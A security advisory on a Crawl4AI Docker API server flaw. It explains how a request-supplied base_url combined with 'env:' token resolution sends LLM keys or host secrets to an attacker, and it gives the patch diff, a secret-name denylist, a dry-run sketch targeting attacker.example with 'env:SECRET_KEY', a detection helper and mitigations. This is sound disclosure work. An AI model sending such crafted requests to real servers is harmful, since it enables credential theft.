Jun 16, 2026
Unauthenticated remote attackers can exfiltrate LLM API keys and sensitive environment variables from Crawl4AI Docker servers by exploiting request-supplied base_url redirects and env-token resolution.
A technical evaluation of the Crawl4AI open-source web crawling and scraping library revealed a high-severity credential exfiltration vulnerability in its self-hosted Dockerized API server. The flaw arises from an unvalidated base_url parameter in request payloads and a dynamic prefix resolution mechanism that retrieves system environment variables. Unauthenticated remote attackers can leverage these features in tandem to extract host-level secrets or redirect configured LLM API keys to an external listener under their control.
The Crawl4AI open-source web crawling and scraping library features a Dockerized API server to facilitate automated content extraction. This server provides several HTTP endpoints, including /md, /llm, and /llm/job, which allow clients to utilize Large Language Models (LLMs) via integrations such as LiteLLM. Users can supply parameters in their request bodies to customize behavior, configuring providers and formatting results dynamically.
A security analysis identified a structural design vulnerability in how these endpoints process LLM configuration parameters. Specifically, the application allows users to supply custom routing and credential retrieval parameters within standard HTTP request payloads. Because the Docker API server is unauthenticated by default, any network-adjacent or public-facing deployment of this service exposes these endpoints to unauthorized requests.
This structural exposure allows unauthenticated remote attackers to redirect API keys or retrieve local system secrets. The weakness is classified under CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-522 (Insufficiently Protected Credentials), and CWE-918 (Server-Side Request Forgery). The vulnerability is tracked as GHSA-f989-c77f-r2cq and is patched in version 0.8.8.
The core vulnerability lies in the combination of two features: unvalidated configuration overrides and dynamic environment variable resolution. First, the Docker API server accepted user-supplied base_url parameters and gave them precedence over the locally configured API endpoint. This allowed arbitrary redirection of outbound LLM requests, while the server still attached its own configured API key to the outbound request headers.
Second, the LLMConfig deserialization routine supported a prefix named env:. If a client specified "api_token": "env:VAR_NAME", the backend dynamically resolved this string using Python's os.getenv("VAR_NAME"). Because any client could pass these configuration parameters to endpoints without authentication, this mechanism created an arbitrary environment variable reader.
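A minimal sketch of the resolution step follows, assuming it reduces to a prefix check followed by os.getenv(). The function name resolve_api_token is hypothetical and is not Crawl4AI's actual code; it only shows why an unrestricted `env:` lookup turns a request field into an environment variable reader.

```python
import os
from typing import Optional

# Hypothetical reconstruction of the pre-0.8.8 behaviour described above:
# a token beginning with "env:" is treated as the name of a server-side
# environment variable and resolved on the host.
ENV_PREFIX = "env:"


def resolve_api_token(value: Optional[str]) -> Optional[str]:
    """Return a literal token unchanged, or the value of the named env var for 'env:' tokens."""
    if value and value.startswith(ENV_PREFIX):
        var_name = value[len(ENV_PREFIX):]
        # No check on which variable is requested: any name the client sends is read.
        return os.getenv(var_name)
    return value


if __name__ == "__main__":
    os.environ["SECRET_KEY"] = "demo-jwt-signing-key"  # stand-in for a real host secret
    print(resolve_api_token("sk-literal-token"))
    print(resolve_api_token("env:SECRET_KEY"))
```

Because the lookup happens on the server, the caller never needs to know the secret's value, only its variable name.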
The combination of these two elements creates a multi-stage exploitation vector. An attacker can direct the application to request an environment variable containing a system secret, resolve its value, and route the resulting outbound payload directly to an attacker-controlled listener. Because the application processes these configurations on a per-request basis, the vulnerability requires no local file system access or persistent server modifications.
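The chain can be modelled as a dry run that builds, but never sends, the outbound request. Everything here is an illustrative assumption: build_request, OutboundRequest, SERVER_BASE_URL, the example upstream URL, and the OpenAI-style `/chat/completions` path are hypothetical stand-ins, not Crawl4AI's internals. The model contrasts the `base_url or <configured>` precedence from versions up to 0.8.7 with the 0.8.8 behaviour of ignoring the request value.

```python
import os
from dataclasses import dataclass
from typing import Dict, Optional

# Hypothetical operator configuration; the URL is only an example value.
SERVER_BASE_URL = "https://api.openai.com/v1"


@dataclass
class OutboundRequest:
    url: str
    headers: Dict[str, str]


def resolve_token(value: Optional[str]) -> Optional[str]:
    # Pre-0.8.8 style "env:" resolution, with no restriction on the variable name.
    if value and value.startswith("env:"):
        return os.getenv(value[len("env:"):])
    return value


def build_request(body: dict, server_key: str, patched: bool) -> OutboundRequest:
    """Model where the LLM call would go and which bearer token it would carry."""
    requested = body.get("api_token")
    token = resolve_token(requested) if requested else server_key
    if patched:
        # 0.8.8 behaviour: the request-supplied base_url is ignored.
        base_url = SERVER_BASE_URL
    else:
        # <= 0.8.7 behaviour: `base_url or <configured>` lets the request win.
        base_url = body.get("base_url") or SERVER_BASE_URL
    # The separate env: denylist fix is deliberately not modelled here.
    return OutboundRequest(
        url=base_url.rstrip("/") + "/chat/completions",
        headers={"Authorization": f"Bearer {token}"},
    )


if __name__ == "__main__":
    os.environ["SECRET_KEY"] = "demo-jwt-signing-key"  # stand-in for a real secret
    body = {"api_token": "env:SECRET_KEY", "base_url": "https://attacker.example"}
    print(build_request(body, server_key="sk-server", patched=False))
    print(build_request(body, server_key="sk-server", patched=True))
```

With `patched=False` the resolved secret travels to the attacker's host; with only base_url set, the configured server key does. With `patched=True` the destination stays fixed, which is why the base_url change alone closes the exfiltration path to external listeners.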
The vulnerability is addressed in Crawl4AI version 0.8.8. The code changes focus on restricting request-supplied URL configurations and implementing a denylist for environment variable resolution.
In deploy/docker/api.py, the original implementation prioritized the user-supplied base_url if present. The patch modified this behavior to completely ignore the request-supplied parameter, falling back strictly to the server-configured base URL:
```python
# File: deploy/docker/api.py
# Original vulnerable line:
# base_url=base_url or get_llm_base_url(config, resolved_provider),
# Patched line:
base_url=get_llm_base_url(config, resolved_provider),  # ignore request base_url (key-exfil vector)
```

In crawl4ai/async_configs.py, the patch adds a validation routine, _is_forbidden_env_name, which screens requested environment variable names against exact matches, prefixes, and substrings associated with secrets before os.getenv() is invoked:
```python
# File: crawl4ai/async_configs.py
_FORBIDDEN_ENV_SUBSTRINGS = ("SECRET", "PASSWORD", "PRIVATE", "PASSWD")
_FORBIDDEN_ENV_PREFIXES = ("CRAWL4AI", "AWS_SECRET")
_FORBIDDEN_ENV_EXACT = {"SECRET_KEY", "REDIS_PASSWORD", "TOKEN"}


def _is_forbidden_env_name(name: str) -> bool:
    # Empty names are rejected outright.
    if not name:
        return True
    # Matching is case-insensitive: all checks use the upper-cased name.
    u = name.upper()
    if u in _FORBIDDEN_ENV_EXACT:
        return True
    if any(s in u for s in _FORBIDDEN_ENV_SUBSTRINGS):
        return True
    if any(u.startswith(p) for p in _FORBIDDEN_ENV_PREFIXES):
        return True
    return False
```

While this denylist blocks the most immediate targets (for example, SECRET_KEY), it relies on string matching. If administrators store credentials in variables whose names match none of these patterns (such as DATABASE_URL or API_KEY_VAL), those values remain resolvable through the env: prefix. Operators must therefore ensure that no sensitive variable falls outside the denylist's patterns.
Exploitation of this vulnerability requires network access to the unauthenticated Crawl4AI Docker server endpoints. Since the server does not enforce authentication by default, any external entity can send a POST request containing a crafted JSON payload.
An attacker can capture configured LLM keys by directing the backend to route requests to an external server. When the attacker sends a request to /llm with base_url set to an attacker-controlled endpoint, the server builds the standard API call, including the legitimate, locally configured provider API key in the authorization header, and sends it to that endpoint.
To extract general system secrets, the attacker combines both parameters: api_token is set to "env:SECRET_KEY" and base_url to the attacker's listening server. When it parses the request, the backend resolves SECRET_KEY, the host's JWT signing key, and sends it as the bearer token to the attacker's listener.
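For defenders reviewing logs or filtering traffic in front of an unpatched server, the two indicators described above (a request-supplied base_url and an env:-prefixed token) can be flagged in request bodies. The sketch below is a hypothetical helper, not part of Crawl4AI; it assumes JSON bodies and searches all nesting levels because the exact payload schema is not given here.

```python
import json
from typing import Any, Iterator, List, Tuple


def _walk(node: Any, path: str = "$") -> Iterator[Tuple[str, Any]]:
    """Yield (json_path, value) for every node in a parsed JSON document."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def find_suspicious_llm_fields(raw_body: str) -> List[str]:
    """Flag request-supplied base_url keys and env:-prefixed string values."""
    findings = []
    for path, value in _walk(json.loads(raw_body)):
        if path.endswith(".base_url") and value:
            findings.append(f"{path}: request-supplied base_url {value!r}")
        # Case-insensitive match is a conservative choice; the server's own
        # prefix handling may be case-sensitive.
        elif isinstance(value, str) and value.strip().lower().startswith("env:"):
            findings.append(f"{path}: env: token reference {value!r}")
    return findings
```

For example, a body containing both `"base_url": "https://attacker.example"` and a nested `"api_token": "env:SECRET_KEY"` produces two findings, while an ordinary request produces none.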
Successful exploitation has a high confidentiality impact. Attackers can fully compromise any upstream LLM API accounts (such as OpenAI, Anthropic, or Hugging Face) whose keys are configured on the target system, potentially leading to unauthorized charges or data exposure.
Furthermore, the exfiltration of host-level environment variables extends the threat vector beyond simple LLM keys. Attackers can target system passwords, AWS credentials, session database keys, and JWT secrets, allowing them to escalate privileges or access adjacent backend databases.
Because the Docker server runs unauthenticated by default, this vulnerability is highly accessible to remote actors. The CVSS v3.1 score is evaluated at 8.2 (High), reflecting a high confidentiality impact and a low attack complexity.
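The 8.2 figure follows from the CVSS v3.1 base-score formula. The sketch below implements that formula for Scope: Unchanged vectors only, using the metric weights and the Roundup function from the FIRST CVSS v3.1 specification; base_score is a hypothetical helper name.

```python
import math

# CVSS v3.1 metric weights (FIRST specification), Scope: Unchanged values only.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal value >= x, avoiding float drift."""
    int_input = round(x * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    # "CVSS:3.1/AV:N/..." -> {"AV": "N", ...}; the version prefix is skipped.
    m = dict(part.split(":") for part in vector.split("/")[1:])
    if m["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * PR_UNCHANGED[m["PR"]] * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"))  # 8.2
```

Here the impact sub-score is about 4.22 and exploitability about 3.89; their sum, roughly 8.10, rounds up to 8.2.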
The primary remediation is to upgrade the Crawl4AI package and Docker containers to version 0.8.8 or later. This release disables arbitrary base_url overrides from incoming API requests and restricts env: prefix resolution.
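A quick way to confirm the installed Python package is at or above the fixed release is sketched below. It assumes the distribution is installed under the name crawl4ai and uses a simplified version parser (hypothetical helpers parse_release and is_patched) rather than full PEP 440 handling; it does not inspect Docker image tags, which must be checked separately.

```python
import re
from importlib import metadata

FIXED_VERSION = (0, 8, 8)


def parse_release(version: str) -> tuple:
    """Parse the leading numeric release segment, e.g. '0.8.7' -> (0, 8, 7).

    Simplified: suffixes such as 'rc1' or '.post1' are dropped, so a
    pre-release like '0.8.8rc1' compares as if it were the final 0.8.8.
    """
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(p) for p in match.group(0).split("."))


def is_patched(version: str) -> bool:
    return parse_release(version) >= FIXED_VERSION


if __name__ == "__main__":
    try:
        installed = metadata.version("crawl4ai")
    except metadata.PackageNotFoundError:
        print("crawl4ai is not installed in this environment")
    else:
        print(installed, "patched" if is_patched(installed) else "VULNERABLE (< 0.8.8)")
```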
If immediate patching is not feasible, administrators must enable API token authentication by configuring the CRAWL4AI_API_TOKEN environment variable. This configuration ensures that only authorized entities can interact with the server endpoints, mitigating anonymous exploitation.
Additionally, network-level egress filtering should be configured on the hosting environment. Restricting the container's outbound network calls to specific, trusted upstream API domains (e.g., api.openai.com) prevents the redirection of requests to malicious external servers.
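The same allowlist idea can also be mirrored at the application layer as defence in depth; this is a complementary check, not a substitute for network egress rules. The sketch below is hypothetical: ALLOWED_LLM_HOSTS and is_allowed_upstream are illustrative names, and the host list is an example to be replaced with the providers a deployment actually uses.

```python
from urllib.parse import urlsplit

# Example allowlist: replace with the upstream LLM hosts the deployment actually uses.
ALLOWED_LLM_HOSTS = {"api.openai.com", "api.anthropic.com"}


def is_allowed_upstream(url: str) -> bool:
    """Return True only for HTTPS URLs whose exact hostname is on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    # .hostname strips userinfo and port and lower-cases the host, so
    # "https://api.openai.com@attacker.example/" resolves to attacker.example.
    host = (parts.hostname or "").rstrip(".")
    return host in ALLOWED_LLM_HOSTS
```

Exact hostname matching is used instead of suffix or substring matching so that look-alike hosts such as api.openai.com.attacker.example are rejected.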
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| crawl4ai (unclecode) | <= 0.8.7 | 0.8.8 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-200 / CWE-522 / CWE-918 |
| Attack Vector | Network (AV:N) |
| CVSS v3.1 | 8.2 (High) |
| Exploit Status | Proof of Concept / Functional |
| KEV Status | Not Listed |
| Primary Impact | Exfiltration of LLM API credentials and host environment variables |
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor): the product exposes sensitive information to an actor who is not authorized to have access to that information.